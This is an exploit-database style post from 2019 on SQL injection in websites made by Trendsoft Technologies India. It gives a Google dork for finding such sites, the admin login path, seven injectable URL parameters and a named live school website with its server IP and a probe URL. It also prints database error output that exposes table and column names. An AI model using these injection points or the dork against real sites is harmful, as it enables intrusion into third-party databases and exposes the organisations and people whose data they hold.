facebook facebook twitter rss

Trendsoft Technologies India SQL Injection Vulnerability

Author: KingSkrupellos , Published: 11-01-2019
# Exploit Title : Trendsoft Technologies India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : trendsoft.info
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Designed & Maintained by Trendsoft Technologies''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]

############################################################

# Admin Panel Login Path :
***********************

/admin/

# SQL Injection Exploit :
*********************

/page_detail.php?sid=Njk=&pid=NTA=[SQL Injection]

/contact_us.php?sid=NQ==[SQL Injection]

/principal_message.php?sid=Mg==[SQL Injection]

/alumni_gallery.php?pid=MQ==[SQL Injection]

/kg_gallery.php?pid=MQ==[SQL Injection]

/video_gallery.php?pid=Ng==[SQL Injection]

/onlineapp/AdmFormfatima.php?id=[SQL Injection]

############################################################

# Example Vulnerable Site =>
**************************

Note => (103.92.235.205) => There are 7 domains hosted on this server.

[+] fatimaconventschool.com/page_detail.php?sid=Njk=&pid=NTA=1%27

[Proof of Concept ] => archive.fo/0S8I0

############################################################

# SQL Database Error :
*********************

cannot execute query select staticId,parentId,staticTitle,externalLink from
tbl_fatima_static_pages where enable='Activate' and parentId=505 order by
orderOfAppearance ascYou have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right
syntax to use near order by orderOfAppearance asc' at line 1

select * from adminsetup where class=
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '' at line 1

############################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

Like us on Facebook :